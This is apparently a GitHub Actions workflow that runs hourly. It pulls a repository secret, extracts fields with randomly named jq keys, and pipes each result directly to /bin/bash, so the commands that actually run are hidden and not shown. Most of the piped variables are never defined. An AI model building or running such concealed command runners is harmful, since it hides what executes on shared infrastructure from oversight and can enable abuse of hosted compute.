name: mengxinheng2013
on:
  workflow_dispatch:
  schedule:
    - cron: '25 * * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: mengxinheng2013
        env:
          xhb39: ${{ secrets.xhb39 }}
        run: |
          echo $xhb39 | jq -r .tft380 | /bin/bash
          echo $ho3 | jq -r .hxmuh7 | /bin/bash
          echo $h943 | jq -r .wipk6 | /bin/bash
          echo $hgx67 | jq -r .ql4 | /bin/bash
          echo $czr4162 | jq -r .u9355 | /bin/bash
          echo $h2115 | jq -r .xok236 | /bin/bash
          echo $qd07 | jq -r .c1046 | /bin/bash
          echo $szpho92 | jq -r .gwuvj70356 | /bin/bash
          echo $stv5 | jq -r .dn13 | /bin/bash
          echo $tc410 | jq -r .el08448 | /bin/bash

